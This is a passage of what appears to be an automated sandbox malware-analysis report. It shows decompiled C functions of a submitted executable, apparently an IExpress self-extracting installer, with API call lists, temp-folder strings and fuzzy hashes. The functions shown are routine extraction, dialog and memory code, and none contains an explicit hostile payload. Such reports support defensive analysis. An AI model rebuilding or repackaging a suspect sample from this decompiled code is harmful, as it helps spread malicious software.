                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004030B4), ref: 00404189
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004030B4), ref: 004041E7
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
                                                                                                                                                                                                                                    • Instruction ID: b70afbfb341dd1e48003f8e01e3fe3506c20631bb83d4641c2337169838dded0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7018BF53002147BF3252A664C9AF6B218EDBD4799F10413BBB06B52D09ABCCC1141AD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004019E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E004019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x408004; // 0x8f135e3b
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E004043D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x409a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00406CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                    0x004019e0
                                                                                                                                                                                                                                    0x004019e0
                                                                                                                                                                                                                                    0x004019eb
                                                                                                                                                                                                                                    0x004019f2
                                                                                                                                                                                                                                    0x004019f9
                                                                                                                                                                                                                                    0x004019fc
                                                                                                                                                                                                                                    0x00401a01
                                                                                                                                                                                                                                    0x00401a2a
                                                                                                                                                                                                                                    0x00401a2e
                                                                                                                                                                                                                                    0x00401a3e
                                                                                                                                                                                                                                    0x00401a4f
                                                                                                                                                                                                                                    0x00401a62
                                                                                                                                                                                                                                    0x00401a6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401a03
                                                                                                                                                                                                                                    0x00401a06
                                                                                                                                                                                                                                    0x00401a20
                                                                                                                                                                                                                                    0x00401a20
                                                                                                                                                                                                                                    0x00401a08
                                                                                                                                                                                                                                    0x00401a08
                                                                                                                                                                                                                                    0x00401a14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401a16
                                                                                                                                                                                                                                    0x00401a18
                                                                                                                                                                                                                                    0x00401a70
                                                                                                                                                                                                                                    0x00401a72
                                                                                                                                                                                                                                    0x00401a72
                                                                                                                                                                                                                                    0x00401a14
                                                                                                                                                                                                                                    0x00401a06
                                                                                                                                                                                                                                    0x00401a81

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00401A18
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00401A24
                                                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00401A4F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00401A62
                                                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00401A6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                                                    • Opcode ID: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
                                                                                                                                                                                                                                    • Instruction ID: 9f07e2b583c3b9e3b689e24bd258bcd44b67705ed80a1d215512c7b4a79a90b1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 381152316012199BDB10EF68DE08AAE77B8EB49310F108175F916B61E1DA349E11DF99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004063C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E004063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x408004; // 0x8f135e3b
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E0040658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x409124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x409124 = 0x80070052;
					_t37 = 0;
				}
				return E00406CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                    0x004063cb
                                                                                                                                                                                                                                    0x004063d2
                                                                                                                                                                                                                                    0x004063d8
                                                                                                                                                                                                                                    0x004063ea
                                                                                                                                                                                                                                    0x004063f3
                                                                                                                                                                                                                                    0x00406401
                                                                                                                                                                                                                                    0x00406402
                                                                                                                                                                                                                                    0x00406410
                                                                                                                                                                                                                                    0x00406415
                                                                                                                                                                                                                                    0x00406433
                                                                                                                                                                                                                                    0x00406438
                                                                                                                                                                                                                                    0x00406449
                                                                                                                                                                                                                                    0x00406463
                                                                                                                                                                                                                                    0x0040646d
                                                                                                                                                                                                                                    0x00406477
                                                                                                                                                                                                                                    0x00406477
                                                                                                                                                                                                                                    0x0040647a
                                                                                                                                                                                                                                    0x0040643a
                                                                                                                                                                                                                                    0x0040643a
                                                                                                                                                                                                                                    0x00406444
                                                                                                                                                                                                                                    0x00406444
                                                                                                                                                                                                                                    0x00406492

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004063EB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
                                                                                                                                                                                                                                    • Instruction ID: 9e5926c835beb8d1d737b027b25a5559d0e4d4e7e399f98f9f62a26a88332679
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF21C071A0021CAFDB10DF25DC85FEB7368EB44314F1041BAB985B7290DAB45D958FAC
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004047E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004047E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00401680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x4091e0; // 0x4f6d228
						 *(_t34 + 4) = _t11;
						 *0x4091e0 = _t34;
						return 1;
					}
					_t25 =  *0x408584; // 0x0
					E004044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x408584; // 0x0
				E004044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                    0x004047e8
                                                                                                                                                                                                                                    0x004047f0
                                                                                                                                                                                                                                    0x004047f4
                                                                                                                                                                                                                                    0x0040480f
                                                                                                                                                                                                                                    0x00404811
                                                                                                                                                                                                                                    0x00404814
                                                                                                                                                                                                                                    0x00404814
                                                                                                                                                                                                                                    0x00404816
                                                                                                                                                                                                                                    0x00404817
                                                                                                                                                                                                                                    0x00404829
                                                                                                                                                                                                                                    0x0040482b
                                                                                                                                                                                                                                    0x0040482f
                                                                                                                                                                                                                                    0x0040484f
                                                                                                                                                                                                                                    0x00404852
                                                                                                                                                                                                                                    0x00404855
                                                                                                                                                                                                                                    0x00404855
                                                                                                                                                                                                                                    0x00404857
                                                                                                                                                                                                                                    0x00404858
                                                                                                                                                                                                                                    0x00404860
                                                                                                                                                                                                                                    0x00404865
                                                                                                                                                                                                                                    0x0040486a
                                                                                                                                                                                                                                    0x0040486f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404876
                                                                                                                                                                                                                                    0x00404831
                                                                                                                                                                                                                                    0x00404841
                                                                                                                                                                                                                                    0x00404847
                                                                                                                                                                                                                                    0x0040480b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040480b
                                                                                                                                                                                                                                    0x004047f6
                                                                                                                                                                                                                                    0x00404806
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00404E6F), ref: 004047EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00404823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00404847
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404851
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 359063898-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
                                                                                                                                                                                                                                    • Instruction ID: f9da94a783bc0005b1bc8c3148c785d844e837b74aa1f48265ffd0ddb08f4ce8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C311A7B9604641AFD714AF249D18F773759E7C5300B04893AEB82BB381DA799C068668
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00403680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                    0x0040368c
                                                                                                                                                                                                                                    0x0040368f
                                                                                                                                                                                                                                    0x00403691
                                                                                                                                                                                                                                    0x0040369f
                                                                                                                                                                                                                                    0x004036a7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004036ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004036bc
                                                                                                                                                                                                                                    0x004036bc
                                                                                                                                                                                                                                    0x004036c0
                                                                                                                                                                                                                                    0x004036cb
                                                                                                                                                                                                                                    0x004036c2
                                                                                                                                                                                                                                    0x004036c4
                                                                                                                                                                                                                                    0x004036c4
                                                                                                                                                                                                                                    0x004036da
                                                                                                                                                                                                                                    0x004036e0
                                                                                                                                                                                                                                    0x004036e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004036e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004036ba
                                                                                                                                                                                                                                    0x004036ed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 004036CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
                                                                                                                                                                                                                                    • Instruction ID: f05eb470e6dbefdbdbfe8bdb1bf4a5152229d967e769d6720ff509b3f6c8b066
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E701847290021977DB304AA65C48EEB7A7CEB86B11F04013AB905F62C0D5758654C6A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004065E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E004065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                    0x004065e8
                                                                                                                                                                                                                                    0x004065ed
                                                                                                                                                                                                                                    0x004065ef
                                                                                                                                                                                                                                    0x004065f2
                                                                                                                                                                                                                                    0x004065f4
                                                                                                                                                                                                                                    0x004065f4
                                                                                                                                                                                                                                    0x004065f6
                                                                                                                                                                                                                                    0x004065f7
                                                                                                                                                                                                                                    0x00406608
                                                                                                                                                                                                                                    0x00406611
                                                                                                                                                                                                                                    0x00406618
                                                                                                                                                                                                                                    0x0040661c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040660e
                                                                                                                                                                                                                                    0x00406623
                                                                                                                                                                                                                                    0x00406625
                                                                                                                                                                                                                                    0x0040663b
                                                                                                                                                                                                                                    0x0040663b
                                                                                                                                                                                                                                    0x0040663d
                                                                                                                                                                                                                                    0x00406641
                                                                                                                                                                                                                                    0x00406610
                                                                                                                                                                                                                                    0x00406610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406610
                                                                                                                                                                                                                                    0x00406644
                                                                                                                                                                                                                                    0x00406647
                                                                                                                                                                                                                                    0x00406647
                                                                                                                                                                                                                                    0x00406621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00402B33), ref: 00406602
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00406612
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00406629
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00406635
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                                                    • Opcode ID: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
                                                                                                                                                                                                                                    • Instruction ID: 90baad459b50eabb1a16afa7fd56dffec2b03aec054ee39de7a83aca56c67232
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF02D310045506EE7325B285C888B7BF9CCF87354B1B057FE493B6241DA3E0D168669
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004069B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004069B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x4081f8 = E00406C70();
				__set_app_type(E00406FBE(2));
				 *0x4088a4 =  *0x4088a4 | 0xffffffff;
				 *0x4088a8 =  *0x4088a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x408528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x40851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00407000();
				if( *0x408000 == 0) {
					__setusermatherr(E00407000);
				}
				E004071EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                    0x004069b7
                                                                                                                                                                                                                                    0x004069c2
                                                                                                                                                                                                                                    0x004069c8
                                                                                                                                                                                                                                    0x004069cf
                                                                                                                                                                                                                                    0x004069d8
                                                                                                                                                                                                                                    0x004069de
                                                                                                                                                                                                                                    0x004069e4
                                                                                                                                                                                                                                    0x004069e6
                                                                                                                                                                                                                                    0x004069ec
                                                                                                                                                                                                                                    0x004069f2
                                                                                                                                                                                                                                    0x004069f4
                                                                                                                                                                                                                                    0x00406a00
                                                                                                                                                                                                                                    0x00406a07
                                                                                                                                                                                                                                    0x00406a0d
                                                                                                                                                                                                                                    0x00406a0e
                                                                                                                                                                                                                                    0x00406a15

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00406FC5
                                                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 004069C2
                                                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 004069D8
                                                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 004069E6
                                                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00406A07
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                                                    • Opcode ID: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
                                                                                                                                                                                                                                    • Instruction ID: 6ac6555f9eb226a1f7bfa0f854930428727c3ad6fe2539b3037ce5b820c07743
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0F8705083019FD714BB30AF0A7083B61FB05329B11467EE4A2B63E1CF3E95618A1D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00406952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x405760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}








                                                                                                                                                                                                                                    0x0040695b
                                                                                                                                                                                                                                    0x00406960
                                                                                                                                                                                                                                    0x00406963
                                                                                                                                                                                                                                    0x00406966
                                                                                                                                                                                                                                    0x00406969
                                                                                                                                                                                                                                    0x0040696c
                                                                                                                                                                                                                                    0x00406972
                                                                                                                                                                                                                                    0x00406987
                                                                                                                                                                                                                                    0x0040699f
                                                                                                                                                                                                                                    0x0040699f
                                                                                                                                                                                                                                    0x00406987
                                                                                                                                                                                                                                    0x004069a7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W@,?,00000000,00405760,?,A:\), ref: 0040697F
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00406999
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
